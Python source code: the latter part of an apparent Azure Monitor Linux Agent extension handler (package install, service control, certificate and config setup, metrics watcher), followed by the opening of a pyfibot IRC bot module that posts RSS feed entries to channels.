get_settings() package_directory = os.path.join(os.getcwd(), PackagesDirectory) bundle_path = os.path.join(package_directory, BundleFileName) os.chmod(bundle_path, 100) print (PackageManager, " and ", BundleFileName) OneAgentInstallCommand = "{0} -i {1}".format(PackageManager, bundle_path) hutil_log_info('Running command "{0}"'.format(OneAgentInstallCommand)) # Retry, since install can fail due to concurrent package operations exit_code, output = run_command_with_retries_output(OneAgentInstallCommand, retries = 15, retry_check = retry_if_dpkg_locked, final_check = final_check_if_dpkg_locked) default_configs = { "MCS_ENDPOINT" : "handler.control.monitor.azure.com", "AZURE_ENDPOINT" : "https://monitor.azure.com/", "ADD_REGION_TO_MCS_ENDPOINT" : "true", "ENABLE_MCS" : "false", "MONITORING_USE_GENEVA_CONFIG_SERVICE" : "false", #"OMS_TLD" : "int2.microsoftatlanta-int.com", #"customResourceId" : "/subscriptions/42e7aed6-f510-46a2-8597-a5fe2e15478b/resourcegroups/amcs-test/providers/Microsoft.OperationalInsights/workspaces/amcs-pretend-linuxVM", } # decide the mode if protected_settings is None or len(protected_settings) is 0: default_configs["ENABLE_MCS"] = "true" else: # look for LA protected settings for var in protected_settings.keys(): if "_key" in var or "_id" in var: default_configs[var] = protected_settings.get(var) # check if required GCS params are available MONITORING_GCS_CERT_CERTFILE = None if protected_settings.has_key("certificate"): MONITORING_GCS_CERT_CERTFILE = base64.standard_b64decode(protected_settings.get("certificate")) MONITORING_GCS_CERT_KEYFILE = None if protected_settings.has_key("certificateKey"): MONITORING_GCS_CERT_KEYFILE = base64.standard_b64decode(protected_settings.get("certificateKey")) MONITORING_GCS_ENVIRONMENT = "" if protected_settings.has_key("monitoringGCSEnvironment"): MONITORING_GCS_ENVIRONMENT = protected_settings.get("monitoringGCSEnvironment") MONITORING_GCS_NAMESPACE = "" if protected_settings.has_key("namespace"): MONITORING_GCS_NAMESPACE = protected_settings.get("namespace") MONITORING_GCS_ACCOUNT = "" if protected_settings.has_key("monitoringGCSAccount"): MONITORING_GCS_ACCOUNT = protected_settings.get("monitoringGCSAccount") MONITORING_GCS_REGION = "" if protected_settings.has_key("monitoringGCSRegion"): MONITORING_GCS_REGION = protected_settings.get("monitoringGCSRegion") MONITORING_CONFIG_VERSION = "" if protected_settings.has_key("configVersion"): MONITORING_CONFIG_VERSION = protected_settings.get("configVersion") MONITORING_GCS_AUTH_ID_TYPE = "" if protected_settings.has_key("MONITORING_GCS_AUTH_ID_TYPE"): MONITORING_GCS_AUTH_ID_TYPE = protected_settings.get("MONITORING_GCS_AUTH_ID_TYPE") if ((MONITORING_GCS_CERT_CERTFILE is None or MONITORING_GCS_CERT_KEYFILE is None) and (MONITORING_GCS_AUTH_ID_TYPE is "")) or MONITORING_GCS_ENVIRONMENT is "" or MONITORING_GCS_NAMESPACE is "" or MONITORING_GCS_ACCOUNT is "" or MONITORING_GCS_REGION is "" or MONITORING_CONFIG_VERSION is "": waagent_log_error('Not all required GCS parameters are provided') raise ParameterMissingException else: # set the values for GCS default_configs["MONITORING_USE_GENEVA_CONFIG_SERVICE"] = "true" default_configs["MONITORING_GCS_ENVIRONMENT"] = MONITORING_GCS_ENVIRONMENT default_configs["MONITORING_GCS_NAMESPACE"] = MONITORING_GCS_NAMESPACE default_configs["MONITORING_GCS_ACCOUNT"] = MONITORING_GCS_ACCOUNT default_configs["MONITORING_GCS_REGION"] = MONITORING_GCS_REGION default_configs["MONITORING_CONFIG_VERSION"] = MONITORING_CONFIG_VERSION # write the certificate and key to disk uid = pwd.getpwnam("syslog").pw_uid gid = grp.getgrnam("syslog").gr_gid if MONITORING_GCS_AUTH_ID_TYPE is not "": default_configs["MONITORING_GCS_AUTH_ID_TYPE"] = MONITORING_GCS_AUTH_ID_TYPE if MONITORING_GCS_CERT_CERTFILE is not None: default_configs["MONITORING_GCS_CERT_CERTFILE"] = "/etc/mdsd.d/gcscert.pem" fh = open("/etc/mdsd.d/gcscert.pem", "wb") fh.write(MONITORING_GCS_CERT_CERTFILE) fh.close() os.chown("/etc/mdsd.d/gcscert.pem", uid, gid) os.system('chmod {1} {0}'.format("/etc/mdsd.d/gcscert.pem", 400)) if MONITORING_GCS_CERT_KEYFILE is not None: default_configs["MONITORING_GCS_CERT_KEYFILE"] = "/etc/mdsd.d/gcskey.pem" fh = open("/etc/mdsd.d/gcskey.pem", "wb") fh.write(MONITORING_GCS_CERT_KEYFILE) fh.close() os.chown("/etc/mdsd.d/gcskey.pem", uid, gid) os.system('chmod {1} {0}'.format("/etc/mdsd.d/gcskey.pem", 400)) config_file = "/etc/default/mdsd" config_updated = False try: if os.path.isfile(config_file): data = [] new_data = "" vars_set = set() with open(config_file, "r") as f: data = f.readlines() for line in data: for var in default_configs.keys(): if var in line: line = "export " + var + "=" + default_configs[var] + "\n" vars_set.add(var) break new_data += line for var in default_configs.keys(): if var not in vars_set: new_data += "export " + var + "=" + default_configs[var] + "\n" with open("/etc/default/mdsd_temp", "w") as f: f.write(new_data) config_updated = True if len(new_data) > 0 else False if not config_updated or not os.path.isfile("/etc/default/mdsd_temp"): log_and_exit("install",MissingorInvalidParameterErrorCode, "Error while updating MCS Environment Variables in /etc/default/mdsd") os.remove(config_file) os.rename("/etc/default/mdsd_temp", config_file) uid = pwd.getpwnam("syslog").pw_uid gid = grp.getgrnam("syslog").gr_gid os.chown(config_file, uid, gid) os.system('chmod {1} {0}'.format(config_file, 400)) else: log_and_exit("install", MissingorInvalidParameterErrorCode, "Could not find the file - /etc/default/mdsd" ) except: log_and_exit("install", MissingorInvalidParameterErrorCode, "Failed to add MCS Environment Variables in /etc/default/mdsd" ) return exit_code, output def check_kill_process(pstring): for line in os.popen("ps ax | grep " + pstring + " | grep -v grep"): fields = line.split() pid = fields[0] os.kill(int(pid), signal.SIGKILL) def uninstall(): """ Uninstall the Azure Monitor Linux Agent. This is a somewhat soft uninstall. It is not a purge. Note: uninstall operation times out from WAAgent at 5 minutes """ find_package_manager("Uninstall") if PackageManager == "dpkg": OneAgentUninstallCommand = "dpkg -P azure-mdsd" elif PackageManager == "rpm": OneAgentUninstallCommand = "rpm -e azure-mdsd" else: log_and_exit(operation, UnsupportedOperatingSystem, "The OS has neither rpm nor dpkg" ) hutil_log_info('Running command "{0}"'.format(OneAgentUninstallCommand)) # Retry, since uninstall can fail due to concurrent package operations try: exit_code, output = run_command_with_retries_output(OneAgentUninstallCommand, retries = 4, retry_check = retry_if_dpkg_locked, final_check = final_check_if_dpkg_locked) except Exception as ex: exit_code = 1 output = 'Uninstall failed with error: {0}\n' \ 'Stacktrace: {1}'.format(ex, traceback.format_exc()) return exit_code, output def enable(): """ Start the Azure Monitor Linux Agent Service This call will return non-zero or throw an exception if the settings provided are incomplete or incorrect. Note: enable operation times out from WAAgent at 5 minutes """ exit_if_vm_not_supported('Enable') if is_systemd(): OneAgentEnableCommand = "systemctl start mdsd" else: hutil_log_info("The VM doesn't have systemctl. Using the init.d service to start mdsd.") OneAgentEnableCommand = "/etc/init.d/mdsd start" hutil_log_info('Handler initiating onboarding.') exit_code, output = run_command_and_log(OneAgentEnableCommand) if exit_code is 0: #start metrics process if enable is successful start_metrics_process() return exit_code, output def disable(): """ Disable Azure Monitor Linux Agent process on the VM. Note: disable operation times out from WAAgent at 15 minutes """ #stop the metrics process stop_metrics_process() #stop the Azure Monitor Linux Agent service if is_systemd(): DisableOneAgentServiceCommand = "systemctl stop mdsd" else: DisableOneAgentServiceCommand = "/etc/init.d/mdsd stop" hutil_log_info("The VM doesn't have systemctl. Using the init.d service to stop mdsd.") exit_code, output = run_command_and_log(DisableOneAgentServiceCommand) return exit_code, output def update(): """ Update the current installation of AzureMonitorLinuxAgent No logic to install the agent as agent -> install() will be called with udpate because upgradeMode = "UpgradeWithInstall" set in HandlerManifest """ return 0, "" def stop_metrics_process(): if telhandler.is_running(is_lad=False): #Stop the telegraf and ME services tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False) if tel_out: HUtilObject.log(tel_msg) else: HUtilObject.error(tel_msg) #Delete the telegraf and ME services tel_rm_out, tel_rm_msg = telhandler.remove_telegraf_service() if tel_rm_out: HUtilObject.log(tel_rm_msg) else: HUtilObject.error(tel_rm_msg) if me_handler.is_running(is_lad=False): me_out, me_msg = me_handler.stop_metrics_service(is_lad=False) if me_out: HUtilObject.log(me_msg) else: HUtilObject.error(me_msg) me_rm_out, me_rm_msg = me_handler.remove_metrics_service(is_lad=False) if me_rm_out: HUtilObject.log(me_rm_msg) else: HUtilObject.error(me_rm_msg) pids_filepath = os.path.join(os.getcwd(),'amametrics.pid') # kill existing telemetry watcher if os.path.exists(pids_filepath): with open(pids_filepath, "r") as f: for pids in f.readlines(): kill_cmd = "kill " + pids run_command_and_log(kill_cmd) run_command_and_log("rm "+pids_filepath) def start_metrics_process(): """ Start telemetry process that performs periodic monitoring activities :return: None """ stop_metrics_process() #start telemetry watcher omsagent_filepath = os.path.join(os.getcwd(),'agent.py') args = ['python', omsagent_filepath, '-metrics'] log = open(os.path.join(os.getcwd(), 'daemon.log'), 'w') HUtilObject.log('start watcher process '+str(args)) subprocess.Popen(args, stdout=log, stderr=log) def metrics_watcher(hutil_error, hutil_log): """ Watcher thread to monitor metric configuration changes and to take action on them """ # check every 30 seconds sleepTime = 30 # sleep before starting the monitoring. time.sleep(sleepTime) last_crc = None me_msi_token_expiry_epoch = None while True: try: if os.path.isfile(MdsdCounterJsonPath): f = open(MdsdCounterJsonPath, "r") data = f.read() if (data != ''): json_data = json.loads(data) if len(json_data) == 0: last_crc = hashlib.sha256(data).hexdigest() if telhandler.is_running(is_lad=False): #Stop the telegraf and ME services tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False) if tel_out: HUtilObject.log(tel_msg) else: HUtilObject.error(tel_msg) #Delete the telegraf and ME services tel_rm_out, tel_rm_msg = telhandler.remove_telegraf_service() if tel_rm_out: HUtilObject.log(tel_rm_msg) else: HUtilObject.error(tel_rm_msg) if me_handler.is_running(is_lad=False): me_out, me_msg = me_handler.stop_metrics_service(is_lad=False) if me_out: HUtilObject.log(me_msg) else: HUtilObject.error(me_msg) me_rm_out, me_rm_msg = me_handler.remove_metrics_service(is_lad=False) if me_rm_out: HUtilObject.log(me_rm_msg) else: HUtilObject.error(me_rm_msg) else: crc = hashlib.sha256(data).hexdigest() generate_token = False me_token_path = os.path.join(os.getcwd(), "/config/metrics_configs/AuthToken-MSI.json") if me_msi_token_expiry_epoch is None or me_msi_token_expiry_epoch == "": if os.path.isfile(me_token_path): with open(me_token_path, "r") as f: authtoken_content = f.read() if authtoken_content and "expires_on" in authtoken_content: me_msi_token_expiry_epoch = authtoken_content["expires_on"] else: generate_token = True else: generate_token = True if me_msi_token_expiry_epoch: currentTime = datetime.datetime.now() token_expiry_time = datetime.datetime.fromtimestamp(int(me_msi_token_expiry_epoch)) if token_expiry_time - currentTime < datetime.timedelta(minutes=30): # The MSI Token will expire within 30 minutes. We need to refresh the token generate_token = True if generate_token: generate_token = False msi_token_generated, me_msi_token_expiry_epoch, log_messages = me_handler.generate_MSI_token() if msi_token_generated: hutil_log("Successfully refreshed metrics-extension MSI Auth token.") else: hutil_error(log_messages) if(crc != last_crc): hutil_log("Start processing metric configuration") hutil_log(data) telegraf_config, telegraf_namespaces = telhandler.handle_config( json_data, "udp://127.0.0.1:" + metrics_constants.ama_metrics_extension_udp_port, "unix:///var/run/mdsd/default_influx.socket", is_lad=False) me_handler.setup_me(is_lad=False) start_telegraf_out, log_messages = telhandler.start_telegraf(is_lad=False) if start_telegraf_out: hutil_log("Successfully started metrics-sourcer.") else: hutil_error(log_messages) start_metrics_out, log_messages = me_handler.start_metrics(is_lad=False) if start_metrics_out: hutil_log("Successfully started metrics-extension.") else: hutil_error(log_messages) last_crc = crc telegraf_restart_retries = 0 me_restart_retries = 0 max_restart_retries = 10 # Check if telegraf is running, if not, then restart if not telhandler.is_running(is_lad=False): if telegraf_restart_retries < max_restart_retries: telegraf_restart_retries += 1 hutil_log("Telegraf binary process is not running. Restarting telegraf now. Retry count - {0}".format(telegraf_restart_retries)) tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False) if tel_out: hutil_log(tel_msg) else: hutil_error(tel_msg) start_telegraf_out, log_messages = telhandler.start_telegraf(is_lad=False) if start_telegraf_out: hutil_log("Successfully started metrics-sourcer.") else: hutil_error(log_messages) else: hutil_error("Telegraf binary process is not running. Failed to restart after {0} retries. Please check telegraf.log".format(max_restart_retries)) else: telegraf_restart_retries = 0 # Check if ME is running, if not, then restart if not me_handler.is_running(is_lad=False): if me_restart_retries < max_restart_retries: me_restart_retries += 1 hutil_log("MetricsExtension binary process is not running. Restarting MetricsExtension now. Retry count - {0}".format(me_restart_retries)) me_out, me_msg = me_handler.stop_metrics_service(is_lad=False) if me_out: hutil_log(me_msg) else: hutil_error(me_msg) start_metrics_out, log_messages = me_handler.start_metrics(is_lad=False) if start_metrics_out: hutil_log("Successfully started metrics-extension.") else: hutil_error(log_messages) else: hutil_error("MetricsExtension binary process is not running. Failed to restart after {0} retries. Please check /var/log/syslog for ME logs".format(max_restart_retries)) else: me_restart_retries = 0 except IOError as e: hutil_error('I/O error in monitoring metrics. Exception={0}'.format(e)) except Exception as e: hutil_error('Error in monitoring metrics. Exception={0}'.format(e)) finally: time.sleep(sleepTime) def metrics(): """ Take care of setting up telegraf and ME for metrics if configuration is present """ pids_filepath = os.path.join(os.getcwd(), 'amametrics.pid') py_pid = os.getpid() with open(pids_filepath, 'w') as f: f.write(str(py_pid) + '\n') watcher_thread = Thread(target = metrics_watcher, args = [HUtilObject.error, HUtilObject.log]) watcher_thread.start() watcher_thread.join() return 0, "" # Dictionary of operations strings to methods operations = {'Disable' : disable, 'Uninstall' : uninstall, 'Install' : install, 'Enable' : enable, 'Update' : update, 'Metrics' : metrics, } def parse_context(operation): """ Initialize a HandlerUtil object for this operation. If the required modules have not been imported, this will return None. """ hutil = None if ('Utils.WAAgentUtil' in sys.modules and 'Utils.HandlerUtil' in sys.modules): try: logFileName = 'extension.log' hutil = HUtil.HandlerUtility(waagent.Log, waagent.Error, logFileName=logFileName) hutil.do_parse_context(operation) # parse_context may throw KeyError if necessary JSON key is not # present in settings except KeyError as e: waagent_log_error('Unable to parse context with error: ' \ '{0}'.format(e)) raise ParameterMissingException return hutil def find_package_manager(operation): """ Checks if the dist is debian based or centos based and assigns the package manager accordingly """ global PackageManager global BundleFileName dist, ver = find_vm_distro(operation) dpkg_set = set(["debian", "ubuntu"]) rpm_set = set(["oracle", "redhat", "centos", "red hat", "suse"]) for dpkg_dist in dpkg_set: if dist.lower().startswith(dpkg_dist): PackageManager = "dpkg" BundleFileName = BundleFileNameDeb break for rpm_dist in rpm_set: if dist.lower().startswith(rpm_dist): PackageManager = "rpm" BundleFileName = BundleFileNameRpm break if PackageManager == "": log_and_exit(operation, UnsupportedOperatingSystem, "The OS has neither rpm nor dpkg" ) def find_vm_distro(operation): """ Finds the Linux Distribution this vm is running on. """ vm_dist = vm_id = vm_ver = None try: vm_dist, vm_ver, vm_id = platform.linux_distribution() except AttributeError: vm_dist, vm_ver, vm_id = platform.dist() if not vm_dist and not vm_ver: # SLES 15 and others try: with open('/etc/os-release', 'r') as fp: for line in fp: if line.startswith('ID='): vm_dist = line.split('=')[1] vm_dist = vm_dist.split('-')[0] vm_dist = vm_dist.replace('\"', '').replace('\n', '') elif line.startswith('VERSION_ID='): vm_ver = line.split('=')[1] vm_ver = vm_ver.split('.')[0] vm_ver = vm_ver.replace('\"', '').replace('\n', '') except: log_and_exit(operation, UndeterminateOperatingSystem, 'Undeterminate operating system') return vm_dist, vm_ver def is_vm_supported_for_extension(operation): """ Checks if the VM this extension is running on is supported by AzureMonitorAgent Returns for platform.linux_distribution() vary widely in format, such as '7.3.1611' returned for a VM with CentOS 7, so the first provided digits must match The supported distros of the AzureMonitorLinuxAgent are allowed to utilize this VM extension. All other distros will get error code 51 """ supported_dists = {'redhat' : ['6', '7'], # CentOS 'centos' : ['6', '7'], # CentOS 'red hat' : ['6', '7'], # Oracle, RHEL 'oracle' : ['6', '7'], # Oracle 'debian' : ['8', '9'], # Debian 'ubuntu' : ['14.04', '16.04', '18.04'], # Ubuntu 'suse' : ['12'], 'sles' : ['15'] # SLES } vm_supported = False vm_dist, vm_ver = find_vm_distro(operation) # Find this VM distribution in the supported list for supported_dist in supported_dists.keys(): if not vm_dist.lower().startswith(supported_dist): continue # Check if this VM distribution version is supported vm_ver_split = vm_ver.split('.') for supported_ver in supported_dists[supported_dist]: supported_ver_split = supported_ver.split('.') # If vm_ver is at least as precise (at least as many digits) as # supported_ver and matches all the supported_ver digits, then # this VM is guaranteed to be supported vm_ver_match = True for idx, supported_ver_num in enumerate(supported_ver_split): try: supported_ver_num = int(supported_ver_num) vm_ver_num = int(vm_ver_split[idx]) except IndexError: vm_ver_match = False break if vm_ver_num is not supported_ver_num: vm_ver_match = False break if vm_ver_match: vm_supported = True break if vm_supported: break return vm_supported, vm_dist, vm_ver def exit_if_vm_not_supported(operation): """ Check if this VM distro and version are supported by the AzureMonitorLinuxAgent. If VM is supported, find the package manager present in this distro If this VM is not supported, log the proper error code and exit. """ vm_supported, vm_dist, vm_ver = is_vm_supported_for_extension(operation) if not vm_supported: log_and_exit(operation, UnsupportedOperatingSystem, 'Unsupported operating system: ' \ '{0} {1}'.format(vm_dist, vm_ver)) return 0 def run_command_and_log(cmd, check_error = True, log_cmd = True): """ Run the provided shell command and log its output, including stdout and stderr. The output should not contain any PII, but the command might. In this case, log_cmd should be set to False. """ exit_code, output = run_get_output(cmd, check_error, log_cmd) if log_cmd: hutil_log_info('Output of command "{0}": \n{1}'.format(cmd, output)) else: hutil_log_info('Output: \n{0}'.format(output)) # also write output to STDERR since WA agent uploads that to Azlinux Kusto DB # take only the last 100 characters as extension cuts off after that try: if exit_code is not 0: sys.stderr.write(output[-500:]) if "Permission denied" in output: # Enable failures # https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr exit_code = 52 except: hutil_log_info('Failed to write output to STDERR') return exit_code, output def run_command_with_retries_output(cmd, retries, retry_check, final_check = None, check_error = True, log_cmd = True, initial_sleep_time = InitialRetrySleepSeconds, sleep_increase_factor = 1): """ Caller provides a method, retry_check, to use to determine if a retry should be performed. This must be a function with two parameters: exit_code and output The final_check can be provided as a method to perform a final check after retries have been exhausted Logic used: will retry up to retries times with initial_sleep_time in between tries If the retry_check retuns True for retry_verbosely, we will try cmd with the standard -v verbose flag added """ try_count = 0 sleep_time = initial_sleep_time run_cmd = cmd run_verbosely = False while try_count <= retries: if run_verbosely: run_cmd = cmd + ' -v' exit_code, output = run_command_and_log(run_cmd, check_error, log_cmd) should_retry, retry_message, run_verbosely = retry_check(exit_code, output) if not should_retry: break try_count += 1 hutil_log_info(retry_message) time.sleep(sleep_time) sleep_time *= sleep_increase_factor if final_check is not None: exit_code = final_check(exit_code, output) return exit_code, output def is_dpkg_locked(exit_code, output): """ If dpkg is locked, the output will contain a message similar to 'dpkg status database is locked by another process' """ if exit_code is not 0: dpkg_locked_search = r'^.*dpkg.+lock.*$' dpkg_locked_re = re.compile(dpkg_locked_search, re.M) if dpkg_locked_re.search(output): return True return False def retry_if_dpkg_locked(exit_code, output): """ Some commands fail because the package manager is locked (apt-get/dpkg only); this will allow retries on failing commands. """ retry_verbosely = False dpkg_locked = is_dpkg_locked(exit_code, output) apt_get_exit_code, apt_get_output = run_get_output('which apt-get', chk_err = False, log_cmd = False) if dpkg_locked: return True, 'Retrying command because package manager is locked.', \ retry_verbosely else: return False, '', False def final_check_if_dpkg_locked(exit_code, output): """ If dpkg is still locked after the retries, we want to return a specific error code """ dpkg_locked = is_dpkg_locked(exit_code, output) if dpkg_locked: exit_code = DPKGLockedErrorCode return exit_code def get_settings(): """ Retrieve the configuration for this extension operation """ global SettingsDict public_settings = None protected_settings = None if HUtilObject is not None: public_settings = HUtilObject.get_public_settings() protected_settings = HUtilObject.get_protected_settings() elif SettingsDict is not None: public_settings = SettingsDict['public_settings'] protected_settings = SettingsDict['protected_settings'] else: SettingsDict = {} handler_env = get_handler_env() try: config_dir = str(handler_env['handlerEnvironment']['configFolder']) except: config_dir = os.path.join(os.getcwd(), 'config') seq_no = get_latest_seq_no() settings_path = os.path.join(config_dir, '{0}.settings'.format(seq_no)) try: with open(settings_path, 'r') as settings_file: settings_txt = settings_file.read() settings = json.loads(settings_txt) h_settings = settings['runtimeSettings'][0]['handlerSettings'] public_settings = h_settings['publicSettings'] SettingsDict['public_settings'] = public_settings except: hutil_log_error('Unable to load handler settings from ' \ '{0}'.format(settings_path)) if (h_settings.has_key('protectedSettings') and h_settings.has_key('protectedSettingsCertThumbprint') and h_settings['protectedSettings'] is not None and h_settings['protectedSettingsCertThumbprint'] is not None): encoded_settings = h_settings['protectedSettings'] settings_thumbprint = h_settings['protectedSettingsCertThumbprint'] encoded_cert_path = os.path.join('/var/lib/waagent', '{0}.crt'.format( settings_thumbprint)) encoded_key_path = os.path.join('/var/lib/waagent', '{0}.prv'.format( settings_thumbprint)) decoded_settings = base64.standard_b64decode(encoded_settings) decrypt_cmd = 'openssl smime -inform DER -decrypt -recip {0} ' \ '-inkey {1}'.format(encoded_cert_path, encoded_key_path) try: session = subprocess.Popen([decrypt_cmd], shell = True, stdin = subprocess.PIPE, stderr = subprocess.STDOUT, stdout = subprocess.PIPE) output = session.communicate(decoded_settings) except OSError: pass protected_settings_str = output[0] if protected_settings_str is None: log_and_exit('Enable', 1, 'Failed decrypting ' \ 'protectedSettings') protected_settings = '' try: protected_settings = json.loads(protected_settings_str) except: hutil_log_error('JSON exception decoding protected settings') SettingsDict['protected_settings'] = protected_settings return public_settings, protected_settings def update_status_file(operation, exit_code, exit_status, message): """ Mimic HandlerUtil method do_status_report in case hutil method is not available Write status to status file """ handler_env = get_handler_env() try: extension_version = str(handler_env['version']) status_dir = str(handler_env['handlerEnvironment']['statusFolder']) except: extension_version = "1.0" status_dir = os.path.join(os.getcwd(), 'status') status_txt = [{ "version" : extension_version, "timestampUTC" : time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()), "status" : { "name" : "Microsoft.Azure.Monitor.AzureMonitorLinuxAgent", "operation" : operation, "status" : exit_status, "code" : exit_code, "formattedMessage" : { "lang" : "en-US", "message" : message } } }] status_json = json.dumps(status_txt) # Find the most recently changed config file and then use the # corresponding status file latest_seq_no = get_latest_seq_no() status_path = os.path.join(status_dir, '{0}.status'.format(latest_seq_no)) status_tmp = '{0}.tmp'.format(status_path) with open(status_tmp, 'w+') as tmp_file: tmp_file.write(status_json) os.rename(status_tmp, status_path) def get_handler_env(): """ Set and retrieve the contents of HandlerEnvironment.json as JSON """ global HandlerEnvironment if HandlerEnvironment is None: handler_env_path = os.path.join(os.getcwd(), 'HandlerEnvironment.json') try: with open(handler_env_path, 'r') as handler_env_file: handler_env_txt = handler_env_file.read() handler_env = json.loads(handler_env_txt) if type(handler_env) == list: handler_env = handler_env[0] HandlerEnvironment = handler_env except Exception as e: waagent_log_error(str(e)) return HandlerEnvironment def get_latest_seq_no(): """ Determine the latest operation settings number to use """ global SettingsSequenceNumber if SettingsSequenceNumber is None: handler_env = get_handler_env() try: config_dir = str(handler_env['handlerEnvironment']['configFolder']) except: config_dir = os.path.join(os.getcwd(), 'config') latest_seq_no = -1 cur_seq_no = -1 latest_time = None try: for dir_name, sub_dirs, file_names in os.walk(config_dir): for file_name in file_names: file_basename = os.path.basename(file_name) match = re.match(r'[0-9]{1,10}\.settings', file_basename) if match is None: continue cur_seq_no = int(file_basename.split('.')[0]) file_path = os.path.join(config_dir, file_name) cur_time = os.path.getmtime(file_path) if latest_time is None or cur_time > latest_time: latest_time = cur_time latest_seq_no = cur_seq_no except: pass if latest_seq_no < 0: latest_seq_no = 0 SettingsSequenceNumber = latest_seq_no return SettingsSequenceNumber def run_get_output(cmd, chk_err = False, log_cmd = True): """ Mimic waagent mothod RunGetOutput in case waagent is not available Run shell command and return exit code and output """ if 'Utils.WAAgentUtil' in sys.modules: # WALinuxAgent-2.0.14 allows only 2 parameters for RunGetOutput # If checking the number of parameters fails, pass 2 try: sig = inspect.signature(waagent.RunGetOutput) params = sig.parameters waagent_params = len(params) except: try: spec = inspect.getargspec(waagent.RunGetOutput) params = spec.args waagent_params = len(params) except: waagent_params = 2 if waagent_params >= 3: exit_code, output = waagent.RunGetOutput(cmd, chk_err, log_cmd) else: exit_code, output = waagent.RunGetOutput(cmd, chk_err) else: try: output = subprocess.check_output(cmd, stderr = subprocess.STDOUT, shell = True) exit_code = 0 except subprocess.CalledProcessError as e: exit_code = e.returncode output = e.output return exit_code, output.encode('utf-8').strip() def init_waagent_logger(): """ Initialize waagent logger If waagent has not been imported, catch the exception """ try: waagent.LoggerInit('/var/log/waagent.log', '/dev/stdout', True) except Exception as e: print('Unable to initialize waagent log because of exception ' \ '{0}'.format(e)) def waagent_log_info(message): """ Log informational message, being cautious of possibility that waagent may not be imported """ if 'Utils.WAAgentUtil' in sys.modules: waagent.Log(message) else: print('Info: {0}'.format(message)) def waagent_log_error(message): """ Log error message, being cautious of possibility that waagent may not be imported """ if 'Utils.WAAgentUtil' in sys.modules: waagent.Error(message) else: print('Error: {0}'.format(message)) def hutil_log_info(message): """ Log informational message, being cautious of possibility that hutil may not be imported and configured """ if HUtilObject is not None: HUtilObject.log(message) else: print('Info: {0}'.format(message)) def hutil_log_error(message): """ Log error message, being cautious of possibility that hutil may not be imported and configured """ if HUtilObject is not None: HUtilObject.error(message) else: print('Error: {0}'.format(message)) def log_and_exit(operation, exit_code = 1, message = ''): """ Log the exit message and perform the exit """ if exit_code is 0: waagent_log_info(message) hutil_log_info(message) exit_status = 'success' else: waagent_log_error(message) hutil_log_error(message) exit_status = 'failed' if HUtilObject is not None: HUtilObject.do_exit(exit_code, operation, exit_status, str(exit_code), message) else: update_status_file(operation, str(exit_code), exit_status, message) sys.exit(exit_code) # Exceptions # If these exceptions are expected to be caught by the main method, they # include an error_code field with an integer with which to exit from main class AzureMonitorAgentForLinuxException(Exception): """ Base exception class for all exceptions; as such, its error code is the basic error code traditionally returned in Linux: 1 """ error_code = 1 def get_error_message(self, operation): """ Return a descriptive error message based on this type of exception """ return '{0} failed with exit code {1}'.format(operation, self.error_code) class ParameterMissingException(AzureMonitorAgentForLinuxException): """ There is a missing parameter for the AzureMonitorLinuxAgent Extension """ error_code = MissingorInvalidParameterErrorCode def get_error_message(self, operation): return '{0} failed due to a missing parameter: {1}'.format(operation, self) if __name__ == '__main__' : main()
module_rss.py
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Parse RSS feeds and display new entries on channel @author Henri 'fgeek' Salo <henri@nerv.fi>, Tomi 'dmc' Nykänen, Riku 'Shrike' Lindblad @copyright Copyright (c) 2010-2013 pyfibot developers @licence BSD Possible output syntax: 0 == feed_title: title - url 1 == feed_title: title - shorturl 2 == feed_title: title (id) 3 == feed_title: title 4 == title Config format: database: rss.db delays: rss_sync: 300 # How often we synchronize rss-feeds in seconds output: 7 # Delay in output to channels in seconds output_syntax: 0 bitly_api_key: # Only needed if using shorturl format With output_syntax #2 you could get url via .url <id> """ from __future__ import unicode_literals, print_function, division from threading import Thread import hashlib import logging import logging.handlers import os import re import requests import sqlite3 import sys import traceback try: import feedparser from twisted.internet import reactor import yaml import htmlentitydefs init_ok = True except ImportError, error: print('Error starting rss module: %s' % error) init_ok = False log = logging.getLogger('rss') # Initialize logger t = None t2 = None indexfeeds_callLater = None output_callLater = None rssconfig = None def event_signedon(bot): """Starts rotators""" global indexfeeds_callLater, output_callLater, rssconfig if not init_ok: log.error("Config not ok, not starting rotators") return False if (empty_database > 0): if (indexfeeds_callLater != None): log.info("Stopping previous indexfeeds thread") indexfeeds_callLater.cancel() rotator_indexfeeds(bot, rssconfig["delays"]["rss_sync"]) if (output_callLater != None): log.info("Stopping previous output thread") output_callLater.cancel() rotator_output(bot, rssconfig["delays"]["output"]) def init(botconfig): """Creates database if it doesn't exist""" if not init_ok: log.error("Config not ok, skipping init") return False global rssconfig # Read configuration configfile = os.path.join(sys.path[0], 'modules', 'module_rss.conf') rssconfig = yaml.load(file(configfile)) db_conn = sqlite3.connect(rssconfig["database"]) d = db_conn.cursor() d.execute("CREATE TABLE IF NOT EXISTS feeds (id INTEGER PRIMARY KEY,feed_url TEXT,channel TEXT,feed_title TEXT, output_syntax_id INTEGER);") d.execute("CREATE TABLE IF NOT EXISTS titles_with_urls (id INTEGER PRIMARY KEY,feed_url TEXT,title TEXT,url TEXT,channel TEXT,printed INTEGER,hash TEXT UNIQUE);") db_conn.commit() # Check if database is empty global empty_database empty_database = d.execute("SELECT COUNT(*) FROM feeds").fetchone()[0] d.close() def rss_addfeed(bot, user, channel, feed_url, output_syntax): """Adds RSS-feed to sqlite-database""" global empty_database try: feed_data = feedparser.parse(feed_url) feed_title = feed_data['feed']['title'] except KeyError, e: return bot.say(channel, "Nothing inserted to database. Probably you mistyped URL?") # Initialize connection to database-file db_conn = sqlite3.connect(rssconfig["database"]) d = db_conn.cursor() # Lets create scheme if the database-file does not exist try: fileinfo = os.stat(rssconfig["database"]) if not os.path.isfile(rssconfig["database"]) or fileinfo.st_size == 0: d.execute("CREATE TABLE feeds int primary key unique, url text)") db_conn.commit() bot.say(channel, "Database \"%s\" created." % rssconfig["database"]) except Exception, e: bot.say(channel, "Error: %s" % e) d.execute("SELECT * FROM feeds WHERE feed_url = ? AND channel = ?", (feed_url, channel, )) already_on_db = d.fetchone() if already_on_db is None: data = [None, feed_url, channel, feed_title, output_syntax] d.execute("INSERT INTO feeds VALUES (?, ?, ?, ?, ?)", data) db_conn.commit() d.close() if (empty_database == 0): 